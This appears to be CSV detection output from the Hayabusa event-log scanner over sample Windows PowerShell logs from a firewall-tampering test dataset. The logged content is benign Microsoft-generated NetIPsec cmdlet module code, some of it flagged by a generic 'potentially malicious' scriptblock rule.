[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.445 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.449 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.450 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.450 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.451 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.452 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.462 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.462 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.463 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.463 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.476 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, 